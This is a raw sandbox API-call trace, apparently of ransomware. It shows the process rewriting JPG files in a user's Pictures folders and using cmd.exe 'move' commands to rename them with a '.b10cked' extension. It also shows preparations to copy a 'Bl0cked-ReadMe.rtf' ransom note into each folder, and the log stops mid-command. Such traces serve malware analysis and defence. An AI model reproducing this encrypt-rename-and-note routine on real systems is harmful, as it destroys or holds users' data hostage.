SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3d5e [0143.314] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0143.314] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0143.314] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3d5e [0143.315] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0143.315] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0143.315] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3d5e [0143.315] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0143.315] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0143.315] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3d5e [0143.315] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0143.315] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0143.315] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3d5e [0143.315] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0143.315] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x3876 [0143.315] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0143.316] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0143.316] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0143.316] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x3d5e [0143.316] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0143.316] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0143.316] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0143.316] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x3d5e [0143.316] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0143.316] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0143.316] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x1eae, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x1eae, lpOverlapped=0x0) returned 1 [0143.316] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0143.316] WriteFile (in: hFile=0x114, lpBuffer=0x1273a68*, nNumberOfBytesToWrite=0x1eae, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesWritten=0x12ec1c*=0x1eae, lpOverlapped=0x0) returned 1 [0143.317] SetFilePointer (in: hFile=0x114, lDistanceToMove=-7854, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x1eb0 [0143.317] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x1eae, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x1eae, lpOverlapped=0x0) returned 1 [0143.317] SetFilePointer (in: hFile=0x114, lDistanceToMove=-7854, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x1eb0 [0143.317] WriteFile (in: hFile=0x114, lpBuffer=0x1273a68*, nNumberOfBytesToWrite=0x1eae, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesWritten=0x12ec1c*=0x1eae, lpOverlapped=0x0) returned 1 [0143.321] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kYWWkRklabLUzyrJ9.jpg", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0143.321] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kYWWkRklabLUzyrJ9.jpg", cchWideChar=21, lpMultiByteStr=0x13286f4, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kYWWkRklabLUzyrJ9.jpg", lpUsedDefaultChar=0x0) returned 21 [0143.321] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x3d5e [0143.321] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0143.321] CloseHandle (hObject=0x114) returned 1 [0143.322] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Pictures\\kYWWkRklabLUzyrJ9.jpg", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Pictures\\KYWWKR~1.JPG") returned 0x26 [0143.322] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Pictures\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Pictures\\") returned 0x1a [0143.322] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Pictures\\KYWWKR~1.JPG\" \"C:\\Users\\EEBsYm5\\Pictures\\kYWWkRklabLUzyrJ9.jpg.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Pictures\\KYWWKR~1.JPG\" \"C:\\Users\\EEBsYm5\\Pictures\\kYWWkRklabLUzyrJ9.jpg.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x110, hThread=0x114, dwProcessId=0x140, dwThreadId=0x8c4)) returned 1 [0143.324] CloseHandle (hObject=0x110) returned 1 [0143.324] CloseHandle (hObject=0x114) returned 1 [0143.324] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Pictures\\", cchLength=0x1a | out: lpsz="C:\\USERS\\EEBSYM5\\PICTURES\\") returned 0x1a [0143.324] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Pictures\\", cchLength=0x1a | out: lpsz="C:\\USERS\\EEBSYM5\\PICTURES\\") returned 0x1a [0143.324] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\PICTURES\\", cchCount1=26, lpString2="C:\\USERS\\EEBSYM5\\PICTURES\\", cchCount2=26) returned 2 [0143.324] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0143.324] ReleaseMutex (hMutex=0xf8) returned 1 [0143.324] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0143.324] ReleaseMutex (hMutex=0xf8) returned 1 [0143.324] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0143.324] ReleaseMutex (hMutex=0xf8) returned 1 [0143.324] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0143.324] ReleaseMutex (hMutex=0xf8) returned 1 [0143.324] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\lr0aR2rEWELj\\j4m1cX oc5jpl3U0YC\\EEJhG5emgLWHUyVz.jpg" (normalized: "c:\\users\\eebsym5\\pictures\\lr0ar2rewelj\\j4m1cx oc5jpl3u0yc\\eejhg5emglwhuyvz.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0143.325] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0143.325] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xcf15 [0143.325] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0143.325] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=20011390595) returned 1 [0143.325] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0143.325] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xcf15 [0143.325] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0143.325] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0143.325] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xcf15 [0143.325] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0143.325] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0143.325] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0xcf15 [0143.325] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0143.325] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0143.325] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xcf15 [0143.325] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0143.325] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0143.325] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xcf15 [0143.325] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0143.325] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0143.325] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xcf15 [0143.325] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0143.326] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0143.326] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xcf15 [0143.326] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0143.326] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0143.326] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xcf15 [0143.326] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0143.326] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0143.326] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xcf15 [0143.326] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0143.326] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0xca2d [0143.326] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0143.327] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0143.327] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0143.327] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0xcf15 [0143.327] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0143.327] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0143.327] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0143.327] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0xcf15 [0143.327] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0143.327] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0143.327] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x6789, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x6789, lpOverlapped=0x0) returned 1 [0143.328] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0143.328] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x6789, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x6789, lpOverlapped=0x0) returned 1 [0143.328] SetFilePointer (in: hFile=0x114, lDistanceToMove=-26505, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x678c [0143.328] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x6789, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x6789, lpOverlapped=0x0) returned 1 [0143.328] SetFilePointer (in: hFile=0x114, lDistanceToMove=-26505, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x678c [0143.328] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x6789, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x6789, lpOverlapped=0x0) returned 1 [0143.333] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EEJhG5emgLWHUyVz.jpg", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0143.333] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EEJhG5emgLWHUyVz.jpg", cchWideChar=20, lpMultiByteStr=0x13286f4, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EEJhG5emgLWHUyVz.jpg", lpUsedDefaultChar=0x0) returned 20 [0143.333] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0xcf15 [0143.333] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0143.333] CloseHandle (hObject=0x114) returned 1 [0143.334] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Pictures\\lr0aR2rEWELj\\j4m1cX oc5jpl3U0YC\\EEJhG5emgLWHUyVz.jpg", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\EEJHG5~1.JPG") returned 0x38 [0143.335] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Pictures\\lr0aR2rEWELj\\j4m1cX oc5jpl3U0YC\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\") returned 0x2c [0143.335] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\EEJHG5~1.JPG\" \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\EEJhG5emgLWHUyVz.jpg.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\EEJHG5~1.JPG\" \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\EEJhG5emgLWHUyVz.jpg.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x110, hThread=0x114, dwProcessId=0x6dc, dwThreadId=0xffc)) returned 1 [0143.337] CloseHandle (hObject=0x110) returned 1 [0143.337] CloseHandle (hObject=0x114) returned 1 [0143.337] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Pictures\\lr0aR2rEWELj\\j4m1cX oc5jpl3U0YC\\", cchLength=0x3a | out: lpsz="C:\\USERS\\EEBSYM5\\PICTURES\\LR0AR2REWELJ\\J4M1CX OC5JPL3U0YC\\") returned 0x3a [0143.337] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Pictures\\", cchLength=0x1a | out: lpsz="C:\\USERS\\EEBSYM5\\PICTURES\\") returned 0x1a [0143.337] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\PICTURES\\LR0AR2REWELJ\\J4M1CX OC5JPL3U0YC\\", cchCount1=58, lpString2="C:\\USERS\\EEBSYM5\\PICTURES\\", cchCount2=26) returned 3 [0143.337] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Pictures\\lr0aR2rEWELj\\j4m1cX oc5jpl3U0YC\\", cchLength=0x3a | out: lpsz="C:\\USERS\\EEBSYM5\\PICTURES\\LR0AR2REWELJ\\J4M1CX OC5JPL3U0YC\\") returned 0x3a [0143.337] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0143.338] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\PICTURES\\LR0AR2REWELJ\\J4M1CX OC5JPL3U0YC\\", cchCount1=58, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount2=25) returned 3 [0143.338] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF") returned 0x2d [0143.338] CharUpperBuffW (in: lpsz="type \"[FROM_PATH]\" > \"[TO_PATH]\"", cchLength=0x20 | out: lpsz="TYPE \"[FROM_PATH]\" > \"[TO_PATH]\"") returned 0x20 [0143.338] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0143.338] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Pictures\\lr0aR2rEWELj\\j4m1cX oc5jpl3U0YC\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\") returned 0x2c [0143.338] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"[TO_PATH]\"", cchLength=0x42 | out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\BL0CKE~1.RTF\" > \"[TO_PATH]\"") returned 0x42 [0143.338] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0143.338] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type 